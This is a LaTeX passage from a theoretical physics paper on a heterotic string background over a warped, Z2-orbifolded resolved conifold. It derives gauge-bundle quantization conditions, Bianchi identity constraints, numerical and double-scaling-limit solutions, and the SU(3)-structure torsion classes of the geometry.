It will become clear later on that $a$ is the blow-up mode related to the unwarped volume of the four-cycle.
The function (\ref{g2-prof}) can also be determined in an alternative fashion by observing that the standard singular Ricci-flat conifold possesses two harmonic two-forms, which are also shared by the
resolved geometry $\tilde{\mathcal{C}}_6$ (see~\cite{Lu:2002rk} for a similar discussion about the Ricci-flat orbifoldized conifold), where they can be written locally as:
\begin{equation}\label{2form}
\varpi_1 = \frac{1}{4\pi}\,\mathrm{d}\big(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2\big)\,,\qquad
\varpi_2 = \frac{a^4}{4\pi}\,\mathrm{d}\left( \frac{\tilde\omega}{r^4}\right)\,,
\end{equation}
and form a base of two-forms that completely span the gauge field strength:
\begin{equation}\label{F-tf}
\mathcal{F}= \pi\big( \varpi_1\,\vec{p}+ \varpi_2\,\vec{q}\,\big)\cdot \vec{H}
\end{equation}
Note in particular that $\varpi_2$ is normalizable on the warped resolved conifold, while $\varpi_1$ is not, since we have
\begin{equation}
(4\pi)^2\varpi_m \wedge \star_6 \varpi_m =h_m(r)\,\mathrm{d} r\wedge\Omega_1\wedge \Omega_2\wedge \mathrm{d}\psi
\end{equation}
characterized by the functions
\begin{equation}
h_1(r)= r H(r)\,,\qquad h_2(r)= \frac{3 a^8 H(r)}{r^7}\,
\end{equation}
and the conformal factor $H$ is monotonously decreasing with no pole at $r=a$ and asymptotically constant. Thus, contrary to the four-dimensional heterotic solution with a line bundle over warped
Eguchi-Hanson space~\cite{Carlevaro:2008qf}, the fact that the $\varpi_1$ component of the gauge field is non-normalizable implies that $\mathcal{F}$ has non vanishing charge at infinity, due
to $\int_{\infty}\varpi_1\neq 0$.
\subsubsection*{Constraints on the first Chern class of the bundle}
The magnetic fields arising from the gauge background~(\ref{FS}) lead to Dirac-type quantization conditions associated with the compact two-cycles of the geometry.
We first observe that the second homology $H_2(\tilde{\mathcal{C}}_6,\mathbb{R})$ of the resolved conifold is spanned by two representative two-cycles
related to the two blown-up $\mathbb{C} P^1$s pinned at the bolt of $\tilde{\mathcal{C}}_6$:
\begin{equation}
\Sigma_i=\{r=a,\theta_i=\text{const},\phi_i=\text{const},\psi=0\}\,,\quad i=1,2\,.
\end{equation}
One then constructs a dual basis of two-forms, by taking the appropriate combinations of the harmonic two-forms~(\ref{2form}):
\begin{equation}\label{cohom}
L_1 = \tfrac12\big(\varpi_2 -\varpi_1\big)\,,\qquad
L_2 = \tfrac12\big(\varpi_1 +\varpi_2\big)\,,
\end{equation}
which span the second cohomology $H^2(\tilde{\mathcal{C}}_6,\mathbb{R})=\mathbb{R}\oplus\mathbb{R}$.\footnote{The K\"ahler form $J$ being non-integrable is
absent from the second cohomology of $\tilde{\mathcal{C}}_6$.} If we now develop the gauge field-strength~(\ref{F-tf}) on the cohomology base~(\ref{cohom}), one gets that
\begin{equation}
\int_{\Sigma_{1}} \frac{\mathcal{F}}{2\pi} = \frac{1}{2} (\vec{q}-\vec{p})\cdot \vec{H} \quad , \qquad
\int_{\Sigma_{2}} \frac{\mathcal{F}}{2\pi} = \frac{1}{2} (\vec{q}+\vec{p})\cdot \vec{H} \, .
\end{equation}
Imposing a Dirac quantization condition for the adjoint (two-index) representation leads to the possibilities
\begin{subequations}\label{constr-shiftvect}\begin{align}
&q_\ell\pm p_\ell \equiv 0 \mod 2 \qquad \forall \ell=1,\ldots,16 \qquad \text{or} &\nonumber \\ & q_\ell \pm p_\ell \equiv 1 \mod 2 \qquad \forall \ell=1,\ldots,16 \, ,
\end{align}
\end{subequations}
$i.e.$ the vectors $(\vec{p}\pm \vec{q})/2$ have either all entries integer or all entries half-integer.
The former corresponds to bundles 'with vector structure' and the latter to bundles 'without vector structure'~\cite{Berkooz:1996iz}.
The distinction between these types of bundles is given by the generalized Stiefel-Whitney class $\tilde{w}_2 (V)$, measuring the obstruction to associate the
bundle $V$ with an $SO(32)$ bundle.
The vectors $\vec{p}$ and $\vec{q}$ being orthogonal, we choose them to be of the form
$\vec{p}=(p_\ell,0^{n})$ with $\ell=0,\ldots,16-n$ and
$\vec{q}=(0^{16-n},q_\ell)$ with $\ell=16-n+1,\ldots,16$. This gives the separate conditions
\begin{equation}
\left\{
\begin{array}{lr}
q_\ell \equiv 0 \mod 2 \ , \ \ p_\ell \equiv 0 \mod 2 \, , & \quad\text{for} \quad \tilde{w}_2 (V) = 0 \, ,\\[4pt]
q_\ell \equiv 1 \mod 2 \ , \ \ p_\ell \equiv 1 \mod 2 \, , & \quad \text{for} \quad\tilde{w}_2 (V) \neq 0\, ,
\end{array}
\right. \qquad \forall \ell\, .
\label{constr-pandq}
\end{equation}
In addition, as the heterotic string spectrum contains massive states transforming in the spinorial representation of $Spin(32)$ of, say, positive chirality, the shift vectors $\vec p$ and $\vec q$ specifying
the gauge field bundle~(\ref{FS}) have to satisfy the extra constraint~(\ref{Kth}). It yields two conditions:
\begin{equation}\label{Kth2}
\sum_{\ell=1}^{16}\, (p_\ell \pm q_\ell) \equiv 0 \text{ mod }4\, ,
\end{equation}
which are in fact equivalent for bundles with vector structure. In section~\ref{wnpe}, these specific constraints will be re-derived from non-perturbative corrections to the worldsheet theory.
\subsection{The Bianchi identity at leading order}
\label{bianchisect}
To determine the radial profile of the three-form $\mathcal{H}$, $i.e.$ the function $g_2(r)$ in the ansatz~(\ref{sol-ansatz}), we need to solve the
Bianchi identity (\ref{bianchi}); this is generally a difficult task. In the large charges limit $\vec{p}^{\, 2} \gg 1$ (corresponding in the blow-down limit to
considering the back-reaction of a large number of wrapped heterotic five-branes, see latter), the tree-level contribution to the \textsc{rhs} of the Bianchi identity is
dominant and the higher derivative (curvature) term can be neglected. Using the gauge field strength ansatz~(\ref{FS}), equation~(\ref{bianchi}) becomes:
\begin{equation}\label{Bianchi1}
\frac{1}{\alpha'}\, \mathrm{d} \mathcal{H}_{[3]} =
{\displaystyle \frac{1}{4}\Big(\big[\vec{q}^{\, 2} g_2^2 -\vec{p}^{\, 2}\big]\,\Omega_1\wedge\Omega_2 -
\vec{q}^{\, 2}\, g_2\, g_2'\,\mathrm{d} r\wedge\big(\Omega_1+\Omega_2\big)\wedge\tilde\omega\Big) + \mathcal{O}\left(1\right)}\, .
\end{equation}
Then, using the solution of the \textsc{duy} equations~(\ref{g2-prof}), we obtain:
\begin{equation}\label{g3}
g_1^2(r)=\tfrac34\big[1-g_2^2(r)\big]=
\tfrac34\Big[1-\left(\frac{a}{r}\right)^8\Big]
\end{equation}
and the norm of the shift vectors are constrainted to satisfy:
\begin{equation}\label{pqk}
\vec{p}^{\, 2} = \,\vec{q}^{\, 2} = k\,,
\end{equation}
such that the tree-level $F^2$ term on the \textsc{rhs} of the Bianchi identity~(\ref{Bianchi1}) is
indeed the leading contribution. The relevance of one-loop corrections to $\mathcal{H}$ coming from generalized Lorentz Chern-Simons couplings~(\ref{CSform}) will be discussed below.
Finally, one can define a quantized five-brane charge as asymptotically the geometry is given by a cone over
$T^{1,1}/\mathbb{Z}_2 \sim \mathbb{R} P_3\times S^2$:
\begin{equation}\label{N5flux}
Q_5 = \frac{1}{2\pi^2 \alpha'} \int_{\mathbb{R} P_3 , \, \infty}\!\!\!\!\!\! \mathcal{H}_{[3]} \, = \frac{k}{2} \, .
\end{equation}
\subsubsection*{The orbifold of the conifold}
Having determined the functions $g_1(r)$ and $g_2(r)$ governing the $r$ dependence of the torsion three-form and of the gauge bundle
respectively, one can already make some important observation. Since function $g_1 (r)$ (\ref{g3}) vanishes for $r=a$, assuming that the
conformal factor $H(r)$ and its derivative do not vanish there (this will be confirmed by the subsequent numerical analysis),
eq.~(\ref{susy-system}a) implies that the squashing function $f^2(r)$ also vanishes for $r=a$. Therefore the manifold exhibits a
$\mathbb{C}P^1\times \mathbb{C}P^1$ bolt, with possibly a conical singularity.
Then evaluating the second supersymmetry condition (\ref{susy-system}b) at the bolt (where both $f^2$ and $g_1$ vanishes)
we find that $(f^2)' |_{r\to a_+} = \nicefrac{6}{a}$. With this precise first order expansion of $f^2$ near the bolt,
the conical singularity can be removed by restricting the periodicity of the $S^1$ fiber in $T^{1,1}$, as $\psi\sim\psi + 2\pi$ instead of
the original $\psi\in[0,4\pi[$. In other words we need to consider a $\mathbb{Z}_2$ orbifold of the conifold, as studied e.g. in~\cite{Bershadsky:1995sp} in
the Ricci-flat torsionless case.
Following the same argument as in~\cite{PandoZayas2}, the deformation parameter $a$ can be related to the volume of the blown-up four-cycle $\mathbb{C} P^1\times \mathbb{C} P^1$,
and thus represents a {\it local} K\"ahler deformation.
One may wonder whether this analysis can be spoiled by the higher-order $\alpha'$ corrections (as we solved only the Bianchi identity at leading order).
However we will prove in the following that the $\mathbb{Z}_2$ orbifold is also necessary in the full-fledged heterotic worldsheet theory.
\subsection{Numerical solution}
Having analytical expressions for the functions $g_1$ and $g_2$, we can consider solving the first order
system~(\ref{susy-system}) for the remaining functions $f$ and $H$ that arises from the supersymmetry conditions.
If we ask the conformal factor $H$ to be asymptotically constant, as expected from a brane-type solution in
supergravity, the system~(\ref{susy-system}) can only be solved numerically.
\begin{figure}[!t]
\centering
\includegraphics[width=75mm]{tab1.pdf}\hskip5mm
\includegraphics[width=75mm]{tab2.pdf}
\caption{Numerical solution for $f^2(r)$ and $H(r)$, with the choice of parameters $k=10000$ and $a^2/\alpha'k=\{0.0001,0.01,1\}$, respectively thick, thin and dashed lines.}
\label{tab1}
\end{figure}
In figure~\ref{tab1}, we represent a family of such solutions with conformal
factor having the asymptotics:
\begin{equation}\label{Hprofile}
H(r) \stackrel{r\to a^+}{\sim} 1+\frac{\alpha'k}{r^2}\,,\qquad \lim_{r\rightarrow \infty }H(r)=H_{\infty}\, ,
\end{equation}
and a function $f^2$ possessing a bolt singularity at $r=a$ (where the blow-up parameter $a$ has been set previously in defining the gauge bundle).
The dilaton is then determined by the conformal factor, up to a constant, by integrating eq.(\ref{susy-system}a):
\begin{equation}\label{ephi}
e^{2\Phi(r)}=e^{2\Phi_0}H(r)^2\,.
\end{equation}
We observe in particular that since $\lim_{r\to \infty} f^2=1$, the solution interpolates between the squashed resolved conifold at finite $r$ and the usual cone
over the Einstein space $T^{1,1}/\mathbb{Z}_2$ at infinity, thus restoring a Ricci-flat
background asymptotically. In figure~\ref{tab1} we also note that in the regime where $a^2$ is small compared to $\alpha'k$, the function
$f^2$ develops a saddle point that disappears when their ratio tends to one.
As expected from this type of torsional backgrounds, in the blow-down limit the gauge bundle associated with $\vec{q}$ becomes a kind of point-like instanton,
leading to a five-brane-like solution. The appearance of five-branes manifests itself by a singularity in the conformal factor $H$ in
the $r\to0$ limit, hence of the dilaton. In this limit the solution behaves as the backreaction of heterotic five-branes wrapping some supersymmetric vanishing
two-cycle, together with a gauge bundle turned on. As we will see later on this singularity is not smoothed out by the $\mathcal{R}^2$ curvature correction to the
Bianchi identity.
\subsection{Analytical solution in the double-scaling limit}
\label{sec:analytic}
The regime $a^2/\alpha'k\ll 1$ in parameter space allows for a limit where the system~(\ref{susy-system}) admits an analytical solution, which corresponds to a sort of 'near-bolt' or
throat geometry of the family of torsional backgrounds seen above.\footnote{In the blow-down limit where the bundle degenerates to a wrapped five-brane-like solution, this regime should be called a 'near-brane' geometry.}
This solution is valid in the coordinate range:
\begin{equation}
a^2\leqslant r^2 \ll \alpha' k \,.
\end{equation}
Note that this is not a 'near-singularity' regime as the location $a$ of the bolt is chosen hierarchically smaller than the scale $\sqrt{\alpha' k}$ at which
one enters the throat region.
This geometry can be extended to a full solution of heterotic supergravity by means of a {\it double scaling limit}, defined as
\begin{equation}
\label{DSL}
g_s \to 0 \,, \qquad\qquad \mu=\frac{g_s \alpha'}{a^2} \quad \text{fixed}\,,
\end{equation}
and given in terms of the asymptotic string coupling $g_s=e^{\Phi_0}H_{\infty}$ set by the $r\to\infty$ limit of expression~(\ref{ephi}).
This isolates the dynamics near the four-cycle of the resolved singularity, without going to the blow-down limit, i.e. keeping
the transverse space to be conformal to the non-singular resolved conifold.\footnote{For this limit to make sense, one needs to check
that the asymptotic value of the conformal factor $H_\infty$ stays of order one in this regime. We checked with the numerical
solution that this is indeed the case.}
One obtains an interacting theory whose effective string coupling constant is set by the double-scaling parameter $\mu$.
The metric is determined by solving (\ref{susy-system}) in this limit, yielding
the analytic expressions:
\begin{equation}\label{Hfg}
H(r)=\frac{\alpha'k}{r^2}\,,\qquad f^2(r)=g_1^2(r)=\tfrac{3}{4}\Big[1-\left(\frac{a}{r}\right)^8\Big]\, .
\end{equation}
\begin{figure}[!t]
\centering
\includegraphics[width=75mm]{tab3.pdf}\hskip5mm
\includegraphics[width=75mm]{tab4.pdf}
\caption{Comparison of the profiles of $f(r)$ and $H(r)$ for the asymptotically flat supergravity solution (thick line) and its double scaling limit (thin line), for $k=10000$ and $a^2/\alpha'k=0.0001$.}
\label{tab2}
\end{figure}
To be more precise in defining the double-scaling limit one requests to stay at fixed distance from the bolt. We use then the rescaled
dimensionless radial coordinate $R=r/a$, in terms of which one obtains the double scaling limit of the background (\ref{sol-ansatz},\ref{gauge-ansatz},\ref{ephi}):
\begin{subequations}\label{sol-nhl}
\begin{align}
\mathrm{d} s^2 & = \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} + \frac{2\alpha' k}{R^2} \,\biggl[
\tfrac{\mathrm{d} R^2}{1-\tfrac{1}{R^8}} + \frac{R^2}{8}\,
\Big( \mathrm{d}\theta_2^2+\sin^2\theta_1\,\mathrm{d}\phi_1^2 + \mathrm{d}\theta_2^2+\sin^2 \theta_2\,\mathrm{d} \phi_2^2 \Big) \nonumber \\
& \hspace{4.5cm}+\,\frac{R^2}{16} (1-\tfrac{1}{R^8}) \big(\mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2 \big)^2 \biggr]\, , \label{met-sol-nhl}
\\
\mathcal{H}_{[3]} & = \frac{\alpha' k}{8}\, \Big(1-\tfrac{1}{R^8}\Big)\,\big(\Omega_1+\Omega_2\big)\wedge\tilde\omega \, ,\\
e^{\Phi(r)} & = \frac{\mu}{H_{\infty}} \left( \frac{k}{R^2}\right)\, , \\
\mathcal{A}_{[1]} & =\tfrac{1}{4}\Big[\big(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2 \big)\, \vec{p}
+ \tfrac{1}{R^4}\,\tilde\omega\,\vec{q}\, \Big]\cdot \vec{H} \, ,
\end{align}
\end{subequations}
The warped geometry is a six-dimensional torsional analogue of Eguchi-Hanson space, as anticipated before in subsection~\ref{bianchisect}.
We observe that (as for the double-scaling limit of the warped Eguchi-Hanson space studied in~\cite{Carlevaro:2008qf}) the blow-up parameter $a$ disappears from the metric, being absorbed
in the double-scaling parameter $\mu$, hence in the dilaton zero-mode that fixes the effective string coupling.
As can be read off from the asymptotic form of the metric (\ref{sol-nhl}), the metric of its $T^{1,1}$ base is non-Einstein even at infinity, so that the space is not
asymptotically Ricci-flat, contrary to the full supergravity solution corresponding figure~\ref{tab1}.
But as expected, in the regime where $a^2\ll \alpha'Q_5$ both the supergravity and the the near-horizon background agree perfectly in the vicinity of the bolt, as shown in figure~\ref{tab2}.
Finally we notice that taking the near-brane limit of blown-down geometry (which amounts to replace $f^2$ by one in the metric~(\ref{met-sol-nhl}), and turning off the gauge bundle associated with $\vec{q}$) the six-dimensional metric factorizes into a linear dilaton direction and a non-Einstein $T^{1,1}/\mathbb{Z}_2$ space.
\subsection{One-loop contribution to the Bianchi identity}
The supergravity solution (\ref{sol-ansatz}) is valid in the large charges regime $k\gg 1$, where higher derivative (one-loop) corrections to the
Bianchi identity~(\ref{bianchi}) are negligible. Given the general behaviour of the function $f^2$ and $H$ as plotted in figure~\ref{tab1}, we must still
verify that the curvature contribution $\text{tr}\,\mathcal{R}_+\wedge \mathcal{R}_+$ remains finite for large
$k$ and arbitrary value of $a$, for any $r\geqslant a$, with coefficients of order one, so that the truncation performed on the Bianchi identity is
consistent and the solution obtained is reliable.
We can give an 'on-shell' expression of the one-loop contribution in~(\ref{bianchi}) by using the supersymmetry equations (\ref{susy-system}) to
re-express all first and second derivatives of $f$ and $H$ in terms of the functions $g_1$, $f$ and $H$ themselves. We obtain:
\begin{equation}\label{TrRR}
\begin{array}{l}
{\displaystyle \mbox{tr}\, \mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+) \,=}\\[6pt]
{\displaystyle \qquad - 4\Big(
1-\frac{4 f^2}{3} \big(2-f^2\big)
-\frac{2g_1^2(1-f^2)}{3} \Big[\frac{\alpha'k}{r^2 H}\Big]
+\frac{2 g_1^4}{3f^2} \Big[\frac{\alpha'k}{r^2 H}\Big]^2 +\frac{2 g_1^6}{9f^2} \Big[\frac{\alpha'k}{r^2 H}\Big]^3
\Big)
\,\Omega_1\wedge\Omega_2}
\\[10pt]
{\displaystyle \qquad \quad
-8 \Big( 4(1-f^2)^2
+(1-f^2)(1-4g_1^2)\Big[\frac{\alpha'k}{r^2 H}\Big]
+\frac{g_1^2\big(-6 f^2 + g_1^2 (3+2f^4+6f^2)}{3 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^2}
\\[8pt]
{\displaystyle \qquad \qquad
+\frac{g_1^4\big(-3f^2+2g_1^2 (1+2f^2)\big)}{3 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^3
+\frac{2 g_1^8}{9 f^4} \Big[\frac{\alpha'k}{r^2 H}\Big]^4 \Big)
\frac{\mathrm{d} r}{r} \wedge\big(\Omega_1+\Omega_2\big)\wedge \tilde\omega \,.}
\end{array}
\end{equation}
We observe from the numerical analysis of the previous subsection that $f\in[0,1]$ while $H$ is monotonously
decreasing from $H_{\text{max}}=H(a)$ finite to $H_{\infty}>0$. So expression (\ref{TrRR}) remains finite at $r\rightarrow \infty$,
since all overt $r$ contributions come in powers of $\alpha'k/(r^2 H)$, which vanishes at infinity.
Now, since $f$ and $g_1$ both vanish at $r=a$, there might also arise a potential divergences in (\ref{TrRR}) in the vicinity of the bolt. However:
\begin{itemize}
\item At $r=a$, all the potentially divergent terms appear as ratios:
$g_1^{2n}\,f^{-2m}$, with $n\geq m$, and are thus zero or at most finite,
since $g_1$ and $f$ are equal at the bolt.
\item The other contributions all remain finite at the bolt, since they are all expressed as
powers of $\alpha'k/(r^2 H)$, which is maximal at $r=a$, with:
$$
\text{Max}\Big[\frac{\alpha'k}{r^2 H}\Big] = \left(1+\frac{a^2}{\alpha'k}\right)^{-1}\leq1\,.
$$
\end{itemize}
Taking the double-scaling limit, the expression~(\ref{TrRR}) simplifies to:
\begin{equation}\label{TrRR2}
\mbox{tr}\, \mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+) = -\big(4-8g^2+5g^4\big)\,\Omega_1\wedge\Omega_2
- 2\big(16-34g^2+23g^4\big)\,\frac{\mathrm{d} r}{r} \wedge\big(\Omega_1+\Omega_2\big)\wedge \tilde\omega\,,
\end{equation}
where $g_1$ has been rescaled to $g(r)=\sqrt{1-(a/r)^8}$ for simplicity.
We see that this expression does not depend on $k$, because of the particular profile of $H$ in this limit (\ref{Hfg}), and is clearly finite of $\mathcal{O}(1)$ for $r\in[a,\infty[$.
\subsubsection*{Bianchi identity at the bolt}
By using the explicit form for $\text{tr}\,\mathcal{R}_+\wedge \mathcal{R}_+$ determined above, we can evaluate the full Bianchi identity~(\ref{bianchi}) at the bolt.
At $r=a$, the \textsc{nsns} flux $\mathcal{H}$ vanishes, and the tree-level and one-loop contributions are both on the same footing.
The Bianchi identity can be satisfied at the form level for (\ref{TrRR}):
\begin{equation}
0= \text{Tr}\,\mathcal{F}\wedge \mathcal{F}-\text{tr}\,\mathcal{R}(\Omega_+)\wedge \mathcal{R}(\Omega_+)=\big(
\vec{p}^{\, 2} - \vec{q}^{\, 2} + 4 \big)\,\Omega_1\wedge \Omega_2\,
\end{equation}
provided:
\begin{equation}
\vec{p}^{\, 2} = \vec{q}^{\, 2} - 4\,.
\end{equation}
As we will see in section~\ref{sec:param} when deriving the worldsheet theory for the background~(\ref{sol-nhl}), this result will be precisely reproduced in the \textsc{cft} by
the worldsheet normally cancellation condition. It suggests that the $\alpha'$ corrections to the supergravity solution vanish at the bolt, as the worldsheet result is exact.
\subsubsection*{Tadpole condition at infinity}
In order to view the solution~(\ref{sol-ansatz}) as part of a compactification manifold, it is useful to consider the tadpole condition associated to it,
as it has non-vanishing charges at infinity.
One requests at least to cancel the leading term in the asymptotic expansion of the modified Bianchi identity at infinity, where the metric becomes Ricci-flat, and
the five-brane charge can thus in principle be set to zero (not however that the gauge bundle $V$ is different from the standard embedding). In this limit, only the first gauge
bundle specified by the shift vector $\vec{p}$ contributes, so that~(\ref{bianchi}) yields
the constraint:
\begin{equation}\label{tad}
6Q_5= 3\vec{p}^{\, 2} - 4\,.
\end{equation}
Since $\vec{p}\in \mathbb{Z}^{16}$, we can never set the five-brane charge to zero and fulfil this condition.
Furthermore, switching on the five-brane charge could only balance the instanton number of the gauge bundle, but never the curvature contribution, for
elementary numerological reasons. Again, eq.~(\ref{tad}) can only be satisfied in the large charge
regime, where the one-loop contribution is subleading.
In the warped Eguchi-Hanson solution tackled in~\cite{Carlevaro:2008qf}, the background was locally torsional but for some appropriate choice
of Abelian line bundle the five-brane charge could consistently be set to zero;
here no such thing occurs.\footnote{The qualitative difference between the two types of solutions is that Eguchi-Hanson space is asymptotically
locally flat, while the orbifold of the conifold is only asymptotically locally Ricci-flat.} This amounts to say that in the present case torsion is
always present to counterbalance tree-level effects, while
the only way to incorporate higher order contributions is to compute
explicitly the one-loop correction to the background~(\ref{sol-ansatz}) from the Bianchi identity,
as in~\cite{Fu:2008ga}. In the double-scaling limit~(\ref{sol-nhl}), this could in principle be carried out by
the worldsheet techniques developed in~\cite{Tseytlin:1992ri,Bars:1993zf,Johnson:2004zq}, using the gauged \textsc{wzw} model description we discuss in the next section.
\subsection{Torsion classes and effective superpotential}\label{torsion-cl}
In this section we will delve deeper into the $SU(3)$ structure of the background as a way of characterizing the geometry and the flux background we are dealing with. We will briefly go through some elements of the classification of $SU(3)$-structure that we will need in the following (for a more detailled and general presentation, {\it cf.} \cite{Salomon,Gauntlett:2003cy,Grana}). On general grounds, as soon as it departs from Ricci-flatness, a given space acquires intrinsic torsion, which classifies the
$G$-structure it is endowed with. According to its index structure, the intrinsic torsion $T^{i}_{\phantom{i}jk}$ takes value in $\Lambda^1 \otimes \mathfrak{g}^{\perp}$, where $\Lambda^1$ is the space of one-forms, and $\mathfrak{g}\oplus\mathfrak{g}^{\perp}=\mathfrak{spin}(d)$, with $d$ the dimension of the manifold, and it therefore decomposes into irreducible $G$-modules $\mathcal{W}_i$.
\subsubsection*{Torsion classes of SU(3)-structure manifolds}
The six-dimensional manifold of interest has $SU(3)$-structure, and can therefore be classified in terms of the following decomposition of $T$ into of irreducible representations of $SU(3)$:
\begin{equation}
\begin{array}{rcl}
T\in \Lambda^1 \otimes \mathfrak{su}(3)^{\perp}
& =& \mathcal{W}_1\oplus \mathcal{W}_2\oplus \mathcal{W}_3\oplus \mathcal{W}_4\oplus \mathcal{W}_5\\[4pt]
(\boldsymbol{3}+\bar{\boldsymbol{3}})\times (\boldsymbol{1}+\boldsymbol{3}+\bar{\boldsymbol{3}}) & =&
(\boldsymbol{1}+\boldsymbol{1})+(\boldsymbol{8}+\boldsymbol{8})+ (\boldsymbol{6}+\bar{\boldsymbol{6}})
+(\boldsymbol{3} + \bar{\boldsymbol{3}}) +(\boldsymbol{3} + \bar{\boldsymbol{3}})\,.
\end{array}
\end{equation}
This induces a specific decomposition of the exterior derivatives of the $SU(3)$ structure $J$ and $\Omega$ onto the components of the intrinsic torsion $W_i\in \mathcal{W}_i$:
\begin{subequations}\label{intrinsic}
\begin{align}
\mathrm{d} J &= -\tfrac32 \,\text{Im}(W_1^{(1)}\,\bar\Omega)+ W_4^{(3+\bar{3})}\wedge J + W_3^{(6+\bar{6})}\,,\\[4pt]
\mathrm{d} \Omega & = W_1^{(1)}\,J\wedge J + W_2^{(8)}\wedge J + W_5^{(\bar{3})}\wedge \Omega\,,
\end{align}
\end{subequations}
which measures the departure from the Calabi-Yau condition $\mathrm{d} J=0$ and $\mathrm{d}\Omega=0$ ensuring Ricci-flatness.
We have in particular $W_1$ a complex $0$-form, $W_2$ a complex $(1,1)$-form and $W_3$ a real primitive $[(1,2)+(2,1)]$-form. $W_4$ is a real vector and $W_5^{(\bar{3})}$ is the anti-holomorphic
part of the real one-form $W_5^{(3+\bar{3})}$, whose holomorphic piece is projected out in expression (\ref{intrinsic}b).
In addition $W_2$ and $W_3$ are {\it primitives}, i.e. they obey $J\lrcorner W_i=0$, with the generalized inner product of a $p$-form $\alpha_{[p]}$ and $q$-form $\beta_{[q]}$ for $p\leq q$ given by $\alpha\lrcorner\beta=\tfrac{1}{p!}\alpha_{m_1..m_p}\beta^{m_1..m_p}_{\phantom{m_1..m_p}m_{p+1}..m_{q}}$.
The torsion classes can be determined by exploiting the primitivity of $W_2$ and $W_3$ and the defining relations (\ref{topcond}) of the $SU(3)$ structure. Thus, we can recover $W_1$ from both
equations (\ref{intrinsic}). In our conventions, we have then
\begin{equation}
W_1^{(1)} = \tfrac{1}{12}\,J^2\lrcorner \mathrm{d} \Omega \equiv \tfrac{1}{36}\,J^3\lrcorner(\mathrm{d} J\wedge \Omega)\,.
\end{equation}
Likewise, one can compute $W_4$ and $W_5$, by using in addition the relations $J\lrcorner\Omega=J\lrcorner\bar\Omega=0$:
\begin{equation}\label{W4}
W_4^{(3+\bar 3)} = \frac{1}{2}\, J\lrcorner \mathrm{d} J\,,\qquad
\bar W_5^{(3+\bar 3)} =-\tfrac{1}{8} \big(\bar\Omega \lrcorner \mathrm{d}\Omega + \bar\Omega \lrcorner \mathrm{d}\Omega\big)\,.
\end{equation}
This in particular establishes $W_4$ as what is known as the {\it Lee form} of $J$, while, by rewriting $\bar W_5$ as
$\bar W_5=-\tfrac12\text{Re}\Omega\lrcorner \mathrm{d} \text{Re}\Omega=-\tfrac12\text{Im}\Omega\lrcorner \mathrm{d} \text{Im}\Omega$, we
observe that $W_5$ is the Lee form of $\text{Re}\Omega$ or $\text{Im}\Omega$, indiscriminately \cite{Gauntlett:2003cy}. This alternative formulation in terms of the Lee form
is characteristic of the classification of almost Hermitian manifolds.
The torsion class $W_3^{(6+\bar{6})}=W_3^{(6)}+W_3^{(\bar{6})}$ is a bit more involved to compute, but may be determined in components by contracting with the totally
antisymmetric holomorphic and anti-holomorphic tensors of $SU(3)$, which projects to the $\boldsymbol{6}$ or $\bar{\boldsymbol{6}}$ of $SU(3)$:
\begin{equation}\label{W3}
(\star_3 W_3^{(6)})_{\bar a\bar b}=\,(W_3)^{\bar c \bar d}_{\phantom{cd}[\bar a}\, \bar\Omega_{\bar b]\bar c \bar d}\,,\qquad
(\star_{\bar 3}W_3^{(\bar 6)})_{ab}=(W_3)^{cd}_{\phantom{cd}[a}\, \Omega_{b] cd}\,,
\end{equation}
with the metric $\eta_{ab}=2\delta_{a}^{\phantom{a}\bar b}$ and the "Hodge star products" in three dimensions given by $\star_{3}E^{\bar a \bar b} = \epsilon^{\bar a \bar b}_{\phantom{ab}c}\,E^{c}$, and $\star_{\bar{3}}(\bullet)$ applying to the complex conjugate of the former expression.
The \textsc{nsns} flux also decomposes into $SU(3)$ representations:
\begin{equation}\label{flux-class}
\mathcal{H}= -\tfrac32 \,\text{Im}(H^{(1)}\,\bar\Omega)+ H^{(3+\bar3)}\wedge J + H^{(6+\bar6)}\,.
\end{equation}
As a general principle, since torsion is generated by flux, supersymmetry requires that the torsion classes (\ref{intrinsic}) be supported by flux classes in
the same representation of $SU(3)$. Thus, we observe in particular that there is no component of $\mathcal{H}$ in the $(\boldsymbol{8}+\boldsymbol{8})$, which implies that $W_2=0$, for our type of backgrounds.
\subsubsection*{The torsion classes of the warped resolved conifold}
After this general introduction we hereafter give the torsion classes for the warped six-dimensional background~(\ref{sol-ansatz}) studied in this work. They can be extracted from the following differential conditions, which have been established using the supersymmetry equations~(\ref{susy-system}) and the relation~(\ref{g3}):
\begin{subequations}\label{torsion-warp}
\begin{align}
\mathrm{d}\Omega & = 2 \mu(r)\,\big( e^{1256}+e^{1346}+i(e^{1356}-e^{1246})\big)\,,\\
\mathrm{d} J & = -\mu(r)\, \big(e^{123}+e^{145}\big)\,,\\
\mathcal{H} & = \mu(r)\, (e^{236}+e^{456})\,,
\end{align}
\end{subequations}
with the function:
\begin{equation}\label{mu}
\mu(r)= \sqrt{\frac{2}{3}}\,\frac{2\alpha'kg_1^2}{r^3 H^{3/2}f} = -\sqrt{\frac{2}{3}}\frac{f}{\sqrt{H}}\,\Phi'\,.
\end{equation}
Since relations~(\ref{torsion-warp}) imply satisfying the first supersymmetry condition~(\ref{susy-system}a), this induces automatically
$W_1=W_2=0$ (this can be checked explicitly in~(\ref{torsion-warp})),
which in turn entails that the manifold~(\ref{sol-ansatz}a) is complex, since the complex structure is now integrable\footnote{For a six dimensional manifold to be complex,
the differential $\mathrm{d}\Omega$ can only comprise a $(3,1)$ piece, which leads to $W_1=W_2=0$. This condition can be shown to be equivalent to the vanishing of the Nijenhuis tensor, ensuring the integrability of the complex structure.}.
Then, using relations~(\ref{W4}) and~(\ref{W3}), one determines the remaining torsion classes:
\begin{equation}
W_1=W_2=W_3 =0\,, \label{wt1}
\end{equation}
and
\begin{equation}
W_4^{(3+\bar 3)} = \tfrac12\,W_5^{(3+\bar 3)} = -\mu(r)\,\text{Re}E^3\,. \label{wt2}
\end{equation}
They are supported by the flux:
\begin{equation}\label{H33}
H^{(3+\bar 3)}= -\mu(r)\,\text{Im}E^3\,.
\end{equation}
